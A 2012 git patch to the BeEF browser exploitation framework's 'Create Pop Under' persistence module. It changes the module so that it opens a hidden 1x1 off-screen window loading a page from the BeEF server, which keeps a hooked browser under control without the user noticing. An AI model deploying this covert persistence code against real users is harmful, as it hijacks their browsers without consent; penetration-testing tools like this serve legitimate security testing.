From fa59e633b0cf76b0e44b6265c11ef0e9a0607805 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 23 Apr 2012 17:36:25 +0930 Subject: [PATCH] Popunder window now loads a plain page --- extensions/demos/html/plain.html | 5 +++++ modules/persistence/popunder_window/command.js | 4 ++-- modules/persistence/popunder_window/config.yaml | 2 +- 3 files changed, 8 insertions(+), 3 deletions(-) create mode 100644 extensions/demos/html/plain.html diff --git a/extensions/demos/html/plain.html b/extensions/demos/html/plain.html new file mode 100644 index 000000000..ff8ec25c3 --- /dev/null +++ b/extensions/demos/html/plain.html @@ -0,0 +1,5 @@ + + diff --git a/modules/persistence/popunder_window/command.js b/modules/persistence/popunder_window/command.js index f99e11033..92cc6b07b 100644 --- a/modules/persistence/popunder_window/command.js +++ b/modules/persistence/popunder_window/command.js @@ -15,9 +15,9 @@ // beef.execute(function() { - var result="Pop-under window successfully created!"; + var result = "Pop-under window successfully created!"; - window.open(window.location.protocol + '//' + window.location.host + '/demos/basic.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur(); + window.open('http://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur(); window.focus(); diff --git a/modules/persistence/popunder_window/config.yaml b/modules/persistence/popunder_window/config.yaml index cda006873..8af49d40c 100644 --- a/modules/persistence/popunder_window/config.yaml +++ b/modules/persistence/popunder_window/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: "Persistence" name: "Create Pop Under" - description: "Creates a new discrete pop under window with the beef hook included.

This module will add another browser node to the tree. It will be a duplicate. This will be addressed in a future release" + description: "This module creates a new discrete pop under window with the BeEF hook included.

Another browser node will be added to the hooked browser tree." authors: ["ethicalhack3r"] target: user_notify: ["ALL"]